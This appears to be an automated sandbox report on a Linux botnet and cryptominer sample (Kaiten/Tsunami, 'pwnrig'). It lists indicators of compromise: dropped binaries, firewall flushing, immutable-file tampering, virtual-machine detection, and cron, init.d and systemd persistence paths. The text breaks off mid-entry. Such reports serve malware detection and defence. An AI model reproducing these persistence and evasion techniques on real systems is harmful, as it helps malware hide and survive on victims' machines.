max time kernel
149s -
max time network
154s -
ubuntu-18.04_amd64 -
ubuntu1804-amd64-20240226-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
13-03-2024 02:11
Malware Config
Detects Kaiten/Tsunami Payload 10 IoCs
resource yara_rule behavioral1/memory/1828-1-0x00007f4c202d7000-0x00007f4c202eb700-memory.dmp family_kaiten2 behavioral1/memory/2177-4-0x00007fc93e329000-0x00007fc93e33d700-memory.dmp family_kaiten2 behavioral1/memory/2895-9-0x00007f2fe77e7000-0x00007f2fe77fb700-memory.dmp family_kaiten2 behavioral1/memory/3265-12-0x00007fc65ac07000-0x00007fc65ac1b700-memory.dmp family_kaiten2 behavioral1/memory/3292-13-0x00007f77e99b0000-0x00007f77e99c4700-memory.dmp family_kaiten2 behavioral1/memory/3662-16-0x00007fa3a7e6c000-0x00007fa3a7e80700-memory.dmp family_kaiten2 behavioral1/memory/4032-19-0x00007feaff725000-0x00007feaff739700-memory.dmp family_kaiten2 behavioral1/memory/4402-22-0x00007f429bb81000-0x00007f429bb95700-memory.dmp family_kaiten2 behavioral1/memory/4782-25-0x00007fc352293000-0x00007fc3522a7700-memory.dmp family_kaiten2 behavioral1/memory/5152-28-0x00007f854a212000-0x00007f854a226700-memory.dmp family_kaiten2 -
Detects Kaiten/Tsunami payload 10 IoCs
resource yara_rule behavioral1/memory/1828-1-0x00007f4c202d7000-0x00007f4c202eb700-memory.dmp family_kaiten behavioral1/memory/2177-4-0x00007fc93e329000-0x00007fc93e33d700-memory.dmp family_kaiten behavioral1/memory/2895-9-0x00007f2fe77e7000-0x00007f2fe77fb700-memory.dmp family_kaiten behavioral1/memory/3265-12-0x00007fc65ac07000-0x00007fc65ac1b700-memory.dmp family_kaiten behavioral1/memory/3292-13-0x00007f77e99b0000-0x00007f77e99c4700-memory.dmp family_kaiten behavioral1/memory/3662-16-0x00007fa3a7e6c000-0x00007fa3a7e80700-memory.dmp family_kaiten behavioral1/memory/4032-19-0x00007feaff725000-0x00007feaff739700-memory.dmp family_kaiten behavioral1/memory/4402-22-0x00007f429bb81000-0x00007f429bb95700-memory.dmp family_kaiten behavioral1/memory/4782-25-0x00007fc352293000-0x00007fc3522a7700-memory.dmp family_kaiten behavioral1/memory/5152-28-0x00007f854a212000-0x00007f854a226700-memory.dmp family_kaiten -
Executes dropped EXE 31 IoCs
ioc pid Process /etc/init.d/knlib 1766 knlib /tmp/sys-helper 1828 sys-helper /tmp/service-agent 1830 service-agent /tmp/service-agent 2077 service-agent /tmp/sys-helper 2177 sys-helper /tmp/service-agent 2178 service-agent /tmp/service-agent 2446 service-agent /tmp/service-agent 2549 service-agent /tmp/service-agent 2817 service-agent /tmp/sys-helper 2895 sys-helper /tmp/service-agent 2919 service-agent /tmp/service-agent 3187 service-agent /tmp/sys-helper 3265 sys-helper /tmp/sys-helper 3292 sys-helper /tmp/service-agent 3293 service-agent /tmp/service-agent 3561 service-agent /tmp/sys-helper 3662 sys-helper /tmp/service-agent 3663 service-agent /tmp/service-agent 3931 service-agent /tmp/sys-helper 4032 Process not Found /tmp/service-agent 4033 Process not Found /tmp/service-agent 4301 Process not Found /tmp/sys-helper 4402 Process not Found /tmp/service-agent 4403 Process not Found /tmp/service-agent 4671 Process not Found /tmp/sys-helper 4782 Process not Found /tmp/service-agent 4783 Process not Found /tmp/service-agent 5051 Process not Found /tmp/sys-helper 5152 Process not Found /tmp/service-agent 5153 Process not Found /tmp/service-agent 5421 Process not Found -
Flushes firewall rules 12 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 1761 iptables 2238 update-rc.d 2609 update-rc.d 2979 update-rc.d 3353 update-rc.d 3723 update-rc.d 5213 Process not Found 1582 ufw 1890 update-rc.d 4093 Process not Found 4463 Process not Found 4843 Process not Found -
ioc pid Process /lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1589 modprobe -
resource yara_rule behavioral1/files/fstream-5.dat upx behavioral1/files/fstream-15.dat upx behavioral1/files/fstream-17.dat upx -
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 2339 sed 2918 chattr 2978 chattr 3284 chattr 4025 Process not Found 4398 Process not Found 4830 Process not Found 2237 chattr 5195 Process not Found 3332 sh 4022 Process not Found 2705 chattr 4037 Process not Found 4557 Process not Found 2104 hostname 3283 chattr 2591 chattr 4026 Process not Found 4770 Process not Found 4771 Process not Found 2547 chattr 2961 chattr 4021 Process not Found 4397 Process not Found 4698 Process not Found 5314 Process not Found 1826 chattr 2473 hostname 4399 Process not Found 4825 Process not Found 1879 chattr 3352 chattr 4087 Process not Found 4189 Process not Found 5140 Process not Found 1831 sh 3455 chattr 5315 Process not Found 2914 chattr 2703 chattr 3289 chattr 3653 chattr 4023 Process not Found 4089 Process not Found 4827 Process not Found 1823 chattr 3297 hostname 4774 Process not Found 5142 Process not Found 5144 Process not Found 2909 chattr 3657 chattr 4020 Process not Found 5151 Process not Found 3080 sed 1869 sh 2225 chattr 4029 Process not Found 4565 Process not Found 4695 Process not Found 5448 Process not Found 1765 chattr 2907 chattr 3214 hostname -
Checks CPU configuration 1 TTPs 60 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found -
Checks hardware identifiers (DMI) 1 TTPs 64 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /etc/cron.hourly/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/cron.d/pwnrig tee File opened for modification /etc/cron.d/sed9iaGSE sed File opened for modification /etc/cron.monthly/pwnrig Process not Found File opened for modification /etc/cron.daily/seddCy7eF sed File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.monthly/sedIyTeLF sed File opened for modification /var/spool/cron/crontabs/tmp.veCA7F crontab File opened for modification /etc/cron.weekly/pwnrig Process not Found File opened for modification /etc/cron.d/.lib-knlib4 Process not Found File opened for modification /etc/cron.weekly/pwnrig tee File opened for modification /etc/cron.daily/sedZeO2Va sed File opened for modification /etc/cron.weekly/sed7SePcq sed File opened for modification /var/spool/cron/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.monthly/sedXUHydt sed File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.daily/sedY8Bi2s sed File opened for modification /etc/cron.weekly/sedWpUhel sed File opened for modification /etc/cron.weekly/pwnrig tee File opened for modification /etc/cron.d/sedqTnN7c Process not Found File opened for modification /etc/cron.d/sed8KEbx5 Process not Found File opened for modification /var/spool/cron/crontabs/tmp.Rl0xjR Process not Found File opened for modification /etc/cron.daily/sedjHw119 Process not Found File opened for modification /etc/cron.monthly/sedMEY9T3 Process not Found File opened for modification /etc/cron.monthly/seduV5Mon Process not Found File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.d/sedEvzlq8 Process not Found File opened for modification /etc/cron.hourly/pwnrig Process not Found File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.d/sedC7Yf7y sed File opened for modification /var/spool/cron/crontabs/tmp.2NSZMm crontab File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.daily/sedmwZeOR sed File opened for modification /etc/cron.monthly/pwnrig Process not Found File opened for modification /etc/cron.d/sedDu4bcn Process not Found File opened for modification /etc/cron.d/pwnrig Process not Found File opened for modification /etc/cron.d/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.weekly/sedA9xmL7 Process not Found File opened for modification /etc/cron.hourly/pwnrig Process not Found File opened for modification /etc/cron.hourly/sedvi4arG Process not Found File opened for modification /etc/cron.hourly/sed2anSW6 Process not Found File opened for modification /etc/cron.hourly/pwnrig Process not Found File opened for modification /etc/cron.d/sedPzkMzq sed File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.monthly/sed6nZiO9 sed File opened for modification /etc/cron.monthly/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/cron.monthly/.lib-knlib4 Process not Found File opened for modification /etc/cron.d/pwnrig tee File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.d/sedrZV7jQ sed File opened for modification /etc/cron.weekly/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /var/spool/cron/crontabs/tmp.B4PRml crontab File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.d/pwnrig Process not Found File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.weekly/pwnrig Process not Found File opened for modification /etc/cron.daily/pwnrig Process not Found File opened for modification /etc/cron.monthly/sed6rI5RV sed File opened for modification /etc/cron.hourly/sedmbKRBF sed File opened for modification /etc/cron.weekly/.lib-knlib4 Process not Found File opened for modification /var/spool/cron/crontabs/tmp.pHJcTK crontab File opened for modification /etc/cron.hourly/sed3tnEBy sed -
Enumerates running processes
Discovers information about currently running processes on the system
description ioc Process File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/sedFvQMFg Process not Found File opened for modification /etc/init.d/sedeb0me0 Process not Found File opened for modification /etc/init.d/sedSJnK84 Process not Found File opened for modification /etc/init.d/sed0DStVq sed File opened for modification /etc/init.d/sedJ5Xl3s sed File opened for modification /etc/init.d/sedb5l600 sed File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/sedO5MQTN sed File opened for modification /etc/init.d/sed3tZYKF sed File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/sedCq4ZxQ Process not Found File opened for modification /etc/init.d/knlib 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/sed0kqbPa sed -
Modifies systemd 1 TTPs 21 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /etc/systemd/system/knlibe.service 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /etc/systemd/system/pwnrige.service Process not Found -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/types Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/types Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/types Process not Found File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/types Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online service-agent -
Reads hardware information 1 TTPs 64 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/board_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_date service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_date service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_date service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/product_uuid service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/product_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/product_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/product_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/product_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_type Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_date Process not Found -
Writes file to system bin folder 1 TTPs 41 IoCs
description ioc Process File opened for modification /bin/bprofr Process not Found File opened for modification /bin/sysdr Process not Found File opened for modification /bin/knlib5 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /bin/initdr cp File opened for modification /bin/sysdr cp File opened for modification /bin/bprofr cp File opened for modification /bin/crondr Process not Found File opened for modification /bin/crondr cp File opened for modification /bin/bprofr cp File opened for modification /bin/initdr cp File opened for modification /bin/crondr cp File opened for modification /bin/crondr cp File opened for modification /bin/bprofr Process not Found File opened for modification /bin/crondr Process not Found File opened for modification /bin/crondr Process not Found File opened for modification /bin/sysdr Process not Found File opened for modification /bin/sysdr Process not Found File opened for modification /bin/sysdr cp File opened for modification /bin/crondr cp File opened for modification /bin/sysdr cp File opened for modification /bin/crondr Process not Found File opened for modification /bin/bprofr Process not Found File opened for modification /bin/initdr Process not Found File opened for modification /bin/bprofr cp File opened for modification /bin/initdr cp File opened for modification /bin/crondr cp File opened for modification /bin/initdr Process not Found File opened for modification /bin/sysdr Process not Found File opened for modification /bin/sysdr cp File opened for modification /bin/initdr cp File opened for modification /bin/bprofr cp File opened for modification /bin/sysdr cp File opened for modification /bin/initdr cp File opened for modification /bin/sysdr cp File opened for modification /bin/initdr cp File opened for modification /bin/bprofr cp File opened for modification /bin/bprofr Process not Found File opened for modification /bin/initdr Process not Found File opened for modification /bin/bprofr cp File opened for modification /bin/crondr cp File opened for modification /bin/initdr Process not Found -
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets Process not Found File opened for reading /sys/bus/node/devices/node0/access0/initiators Process not Found File opened for reading /sys/devices/system/node/online Process not Found File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth service-agent File opened for reading /sys/bus/dax/devices service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets service-agent File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type Process not Found File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus service-agent File opened for reading /sys/devices/system/node/online service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type Process not Found File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency Process not Found File opened for reading /sys/bus/node/devices/node0/hugepages Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition Process not Found File opened for reading /sys/devices/virtual/dmi/id service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition service-agent File opened for reading /sys/bus/node/devices/node0/access0/initiators service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets Process not Found File opened for reading /sys/devices/virtual/dmi/id Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus service-agent File opened for reading /sys/bus/cpu/devices service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition Process not Found File opened for 